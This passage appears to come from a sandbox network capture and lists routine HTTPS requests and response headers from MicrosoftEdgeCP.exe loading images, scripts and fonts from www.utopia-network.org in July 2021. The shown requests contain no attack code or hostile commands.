                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 20185
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_5.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_5.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 19459
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/benefits/benefits_6.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/benefits/benefits_6.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 41986
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__bg_top.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__bg_top.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 22253
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__img_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__img_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 64776
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 19587
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/channel__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/channel__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 80274
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/channel__img_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/channel__img_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 30386
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/anonymously__img_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/anonymously__img_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 20315
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__title_end.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__title_end.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 86304
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/anonymously__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/anonymously__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 2057
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/tabs__crypton.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/tabs__crypton.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 640
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/js/scripts.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /js/scripts.min.js HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 21 May 2021 21:39:46 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 177
                                                                                          content-type: application/javascript
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/api__img.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/api__img.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 29018
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/js/preloader.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /js/preloader.js HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Tue, 04 May 2021 10:33:58 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-type: application/javascript
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-Medium.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-Medium.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 90268
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-Regular.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-Regular.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 90756
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-SemiBold.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-SemiBold.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 88592
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-Bold.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-Bold.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 92888
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Prompt-Regular.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Prompt-Regular.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 68848
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Prompt-Medium.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Prompt-Medium.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 70732
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Prompt-SemiBold.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Prompt-SemiBold.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 69852
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__bg-glitch.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__bg-glitch.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 23550
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/top-bg_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/top-bg_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 131520
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
